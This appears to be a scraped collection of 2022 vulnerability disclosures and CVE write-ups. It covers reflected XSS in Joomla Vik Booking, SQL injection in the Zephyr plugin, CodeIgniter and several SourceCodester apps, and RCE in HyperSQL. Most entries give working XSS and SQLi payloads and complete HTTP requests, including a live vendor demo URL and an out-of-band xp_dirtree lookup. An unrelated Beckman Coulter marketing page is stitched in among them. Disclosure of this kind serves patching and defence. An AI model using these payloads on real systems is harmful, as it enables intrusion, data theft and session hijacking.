Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Joomla Vik Booking 1.15.0 Cross Site Scripting

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

An SQL injection vulnerability issue was discovered in Sourcecodester Simple E-Learning System 1.0., in /vcs/classRoom.php?classCode=, classCode.

Permalink

Cannot retrieve contributors at this time

**Simple E-Learning System by oretnom23 has SQL injection**

BUG\_Author：xtxxueyan

vendors: https://www.sourcecodester.com/php-simple-e-learning-system-source-code

Vulnerability File: /vcs/classRoom.php?classCode=

Vulnerability location: /vcs/classRoom.php?classCode=, classCode

dbname = vcs\_db

**time-based blind**

Payload: /vcs/classRoom.php?classCode=-9082' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,sleep(5),NULL-- - // Leak place ---> classCode

**boolean-based blind**

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIZ // Leak place ---> classCode

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIQ // Leak place ---> classCode

sqlmap can inject it，can query the database in use now

CVE-2022-40872: bug_report/SQLi-1.md at main · xtxxueyan/bug_report

B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php.

**Multiple functions of CodeIgniter have SQL injection****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

3.0rc <= CodeIgniter <= 3.1.13

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.39

**Vulnerability Details**

CodeIgniter is an Application Development Framework - a toolkit - for people who build web sites using PHP.

SQL injection exists for multiple functions in CodeIgniter, and the versions involved are 3.0rc to 3.1.13

The functions involved are where()、or\_where()、having()、or\_having()、where\_in()、or\_where\_in()、where\_not\_in()、or\_where\_not\_in()、like()、or\_like()、not\_like() and or\_not\_like().

The functions listed above do not filter the query fields. If the developer obtains the query fields from the client, the attacker can modify the query fields and trigger SQL injection.

**Describe**

    File:
        system\database\DB_query_builder.php
    
    Core Functions:
        protected function _wh($qb_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)    //662
        protected function _where_in($key = NULL, $values = NULL, $not = FALSE, $type = 'AND ', $escape = NULL)   //804
        protected function _like($field, $match = '', $type = 'AND ', $side = 'both', $not = '', $escape = NULL)    //947
    
    _wh() Explain
        //The following section provides the complete function code.
        ${$qb_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
        _wh() does not filter $k before splicing $prefix and $k. If we can control $k, SQL injection will be triggered.
        _where_in() and _like() have the same situation.
    
    Public Funtions
        Although  _wh()、where_in() and _like() are protected, but CodeIgniter provides some public functions.
        _wh()
            where()
            or_where()
            having()
            or_having()
        _where_in()        
            where_in()
            or_where_in()
            where_not_in()
            or_where_not_in()
        _like()        
            like()
            or_like()
            not_like()
            or_not_like()
    

protected function \_wh($qb\_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)
{
   $qb\_cache\_key = ($qb\_key === 'qb\_having') ? 'qb\_cache\_having' : 'qb\_cache\_where';
   if ( ! is\_array($key))
   {
   	$key = array($key => $value);
   }
   // If the escape value was not set will base it on the global setting
   is\_bool($escape) OR $escape = $this\->\_protect\_identifiers;
   foreach ($key as $k => $v)
   {
   	$prefix = (count($this\->$qb\_key) === 0 && count($this\->$qb\_cache\_key) === 0)
   		? $this\->\_group\_get\_type('')
   		: $this\->\_group\_get\_type($type);
   	if ($v !== NULL)
   	{
   		if ($escape === TRUE)
   		{
   			$v = $this\->escape($v);
   		}
   		if ( ! $this\->\_has\_operator($k))
   		{
   			$k .= ' = ';
   		}
   	}
   	elseif ( ! $this\->\_has\_operator($k))
   	{
   		// value appears not to have been set, assign the test to IS NULL
   		$k .= ' IS NULL';
   	}
   	elseif (preg\_match('/\\s\*(!?=|<>|\\sIS(?:\\s+NOT)?\\s)\\s\*$/i', $k, $match, PREG\_OFFSET\_CAPTURE))
   	{
   		$k = substr($k, 0, $match\[0\]\[1\]).($match\[1\]\[0\] === '=' ? ' IS NULL' : ' IS NOT NULL');
   	}
   	${$qb\_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
   	$this\->{$qb\_key}\[\] = ${$qb\_key};
   	if ($this\->qb\_caching === TRUE)
   	{
   		$this\->{$qb\_cache\_key}\[\] = ${$qb\_key};
   		$this\->qb\_cache\_exists\[\] = substr($qb\_key, 3);
   	}
   }
   return $this;
}

**Verification(3.1.13)**

    Code Download
        https://github.com/bcit-ci/CodeIgniter/releases/tag/3.1.13
    Apache needs to add the following in .htaccess
        <IfModule mod_rewrite.c>
        Options +FollowSymlinks -Multiviews
        RewriteEngine On
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L]
        </IfModule>
    Environment Construction
        The detailed process is omitted, and the final result is as follows.
    

    File Modification
        1. Edit database configuration file application\config\database.php.
        As a test, I used the information schema of mysql system database 'information-schema'.
    

        2. Download the Sql.php file and move it to the application\controllers\ folder.
        Sql.php uses data table 'engines'.
    

    Try SQL Injection
        1. Normal access 
        Query with the field 'ENGINE'.
        Because the query conditions are different, the results are displayed differently.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE
    

        2.Malicious access
        SQL injection through fields.
        The 12 functions above all display the database name.
        SQL injection will occur when careless developers use fields sent by the front end.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE like '*' union select database(),2,3,4,5,6 -- -
    

  

**Verification(3.0rc)**

  

**Verification(3.1.1)**

CVE-2022-40835: CodeIgniter3.1.13-SQL-Inject/README.md at main · 726232111/CodeIgniter3.1.13-SQL-Inject

A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. Affected is an unknown function of the file /Admin/login.php of the component POST Parameter Handler. The manipulation of the argument txtusername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210246 is the identifier assigned to this vulnerability.

CVE-2022-3414

The default privileges for the running service Normand Service Manager in Beckman Coulter Remisol Advance v2.0.12.1 and prior allows non-privileged users to overwrite and manipulate executables and libraries. This allows attackers to access sensitive data.

**REMISOL Advance\* Middleware**

Focus on patients and results

Increased workloads, extensive documentation and a perpetual need to bridge talent gaps place demands on busy laboratories. For this reason, many are turning to advanced middleware server-and-software platforms for much-needed relief. The REMISOL Advance middleware clinical information management tool bridges LIS and instrumentation, providing real-time insights into operations to improve laboratory efficiencies.

This product may not be available in your country or region at this time. Please contact your Beckman Coulter sales representative or distributor for more information.

**Focus on Patients and Results**

*   **Drive consistency through network standardization.** REMISOL Advance mitigated $30M in LIS integration costs for PCL Alverno
*   **Improve sample workflow through consolidated management.** Standardization with REMISOL Advance consolidated rules for 28 facilities, delivering quality for PCL Alverno
*   **Create efficiency through auto-verification rules management.** REMISOL Advance auto-verification rate of 90% contributed to a 50% improvement in turnaround time for WGKK, Hanusch-Krankenhaus
*   **Integrate QC management to improve reliability.** Error reduction improved by 40% with automation and REMISOL Advance for El Camino Hospital

**What's New: Version 1.9**

**Gain additional multi-site capabilities**

*   Configure site definitions by analyzers, automation lines and/or LIS
*   Establish rule triggers by site

**Use updated rules capabilities**

*   Ease visualization of rules through a redesigned rules wizard
*   Apply new rule triggers—including automation events

**Enhance backup capabilities**

*   Minimize impact to production database when creating archive backup database
*   Simplify access to archive backup data in SQL database

**Tips & Tools**

Select Tips & Tools to access helpful documents and information for your instrument.

**Step 1:** To access content such as job aids, checklists, In-Lab Training Manuals, etc., select the Tips & Tools link in the top left navigation.

**REMISOL Advance Resources**

**Fresno Community Regional Medical Center**

Learn how this medical center decreased TATs and increased the quality of its results.

**El Camino Hospital**

Find out how this hospital improved its overall laboratory efficiency.

Because of our entire solution—REMISOL Advance, the track \[Power Express\] and the AU5812 systems—the quality and consistency of our results are much better.

CORE Lab Lead CLS

Community Regional Medical Center

**Additional Clinical Information Management Tools**

\*REMISOL Advance is a trademark or registered trademark of Normand-Info SAS in the United States and other countries. Used under license.  
†Not available in all regions. Contact your local Beckman Coulter representative for availability.

CVE-2022-26238: REMISOL Advance

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /leave_system/classes/Master.php?f=delete_department.

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Yuanbolin

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

First create a table in the database

CREATE TABLE \`department\_ist\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_department

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_department,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_department HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41355: Bug_report/SQLi-1.md at main · Cvedig/Bug_report

Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.

**HyperSQL DataBase vulnerable to remote code execution when processing untrusted input**

High severity GitHub Reviewed Published Oct 6, 2022 • Updated Oct 6, 2022

GHSA-77xx-rxvh-q682: HyperSQL DataBase vulnerable to remote code execution when processing untrusted input

Simple Cold Storage Management System v1.0 is vulnerable to SQL injection via /csms/admin/inquiries/view_details.php?id=.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: fate@root

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/inquiries/view\_details.php?id=

Vulnerability location: /csms/admin/inquiries/view\_details.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/inquiries/view\_details.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/inquiries/view\_details.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-42250: bug_report/SQLi-1.md at main · fateroot/bug_report

Simple Cold Storage Management System v1.0 is vulnerable to SQL injection via /csms/admin/storages/view_storage.php?id=.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: fate@root

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/storages/view\_storage.php?id=

Vulnerability location: /csms/admin/storages/view\_storage.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/storages/view\_storage.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/storages/view\_storage.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

Tag

#sql